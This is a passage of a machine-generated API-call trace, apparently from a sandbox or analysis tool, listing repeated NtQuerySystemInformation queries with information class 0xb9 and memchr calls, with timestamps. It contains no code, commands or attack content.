NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0188.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0188.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0188.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0188.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0188.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0188.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0188.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe8, Length=0x38, ResultLength=0x0) [0188.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0188.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0188.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0188.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0188.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x38, ResultLength=0x0) [0188.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x30, ResultLength=0x0) [0188.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x28, ResultLength=0x0) [0188.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x30, ResultLength=0x0) [0188.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x38, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd50, Length=0x30, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x28, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd50, Length=0x30, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.290] memchr (_Buf=0x27fc98d9f60, _Val=0, _MaxCount=0x1af) returned 0x27fc98d9f68 [0188.290] memchr (_Buf=0x27fc98d9f69, _Val=0, _MaxCount=0x1a6) returned 0x27fc98d9f74 [0188.290] memchr (_Buf=0x27fc98d9f75, _Val=0, _MaxCount=0x19a) returned 0x27fc98d9f81 [0188.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.291] memchr (_Buf=0x27fc98d9f9e, _Val=0, _MaxCount=0x171) returned 0x27fc98d9fa6 [0188.291] memchr (_Buf=0x27fc98d9fa7, _Val=0, _MaxCount=0x168) returned 0x27fc98d9fb0 [0188.291] memchr (_Buf=0x27fc98d9fb1, _Val=0, _MaxCount=0x15e) returned 0x27fc98d9fc2 [0188.291] memchr (_Buf=0x27fc98d9fc3, _Val=0, _MaxCount=0x14c) returned 0x27fc98d9fcc [0188.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.291] memchr (_Buf=0x27fc98d9fdd, _Val=0, _MaxCount=0x132) returned 0x27fc98d9fe5 [0188.291] memchr (_Buf=0x27fc98d9fe6, _Val=0, _MaxCount=0x129) returned 0x27fc98d9fee [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.292] memchr (_Buf=0x27fc98da006, _Val=0, _MaxCount=0x109) returned 0x27fc98da00e [0188.292] memchr (_Buf=0x27fc98da00f, _Val=0, _MaxCount=0x100) returned 0x27fc98da029 [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.293] memchr (_Buf=0x27fc98da055, _Val=0, _MaxCount=0xba) returned 0x27fc98da057 [0188.293] memchr (_Buf=0x27fc98da058, _Val=0, _MaxCount=0xb7) returned 0x27fc98da066 [0188.293] memchr (_Buf=0x27fc98da067, _Val=0, _MaxCount=0xa8) returned 0x27fc98da091 [0188.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.293] memchr (_Buf=0x27fc98da0aa, _Val=0, _MaxCount=0x65) returned 0x27fc98da0aa [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.294] memchr (_Buf=0x27fc98da0d4, _Val=0, _MaxCount=0x3b) returned 0x27fc98da0da [0188.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.295] memchr (_Buf=0x27fc98da0fb, _Val=0, _MaxCount=0x14) returned 0x27fc98da0fb [0188.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.296] memchr (_Buf=0x27fc98da108, _Val=0, _MaxCount=0x7) returned 0x27fc98da108 [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.297] memchr (_Buf=0x27fc98da10e, _Val=0, _MaxCount=0x1) returned 0x27fc98da10e [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x38, ResultLength=0x0) [0188.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x38, ResultLength=0x0) [0188.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x38, ResultLength=0x0) [0188.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0188.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0188.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0188.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0188.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfc8, Length=0x38, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x30, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdce0, Length=0x28, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x30, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.303] memchr (_Buf=0x27fc98d9f60, _Val=0, _MaxCount=0x1af) returned 0x27fc98d9f68 [0188.304] memchr (_Buf=0x27fc98d9f69, _Val=0, _MaxCount=0x1a6) returned 0x27fc98d9f74 [0188.304] memchr (_Buf=0x27fc98d9f75, _Val=0, _MaxCount=0x19a) returned 0x27fc98d9f81 [0188.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.305] memchr (_Buf=0x27fc98d9f9e, _Val=0, _MaxCount=0x171) returned 0x27fc98d9fa6 [0188.305] memchr (_Buf=0x27fc98d9fa7, _Val=0, _MaxCount=0x168) returned 0x27fc98d9fb0 [0188.305] memchr (_Buf=0x27fc98d9fb1, _Val=0, _MaxCount=0x15e) returned 0x27fc98d9fc2 [0188.305] memchr (_Buf=0x27fc98d9fc3, _Val=0, _MaxCount=0x14c) returned 0x27fc98d9fcc [0188.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde30, Length=0x38, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.306] NtQuerySystemInformation (SystemInformationClass=0xb9, 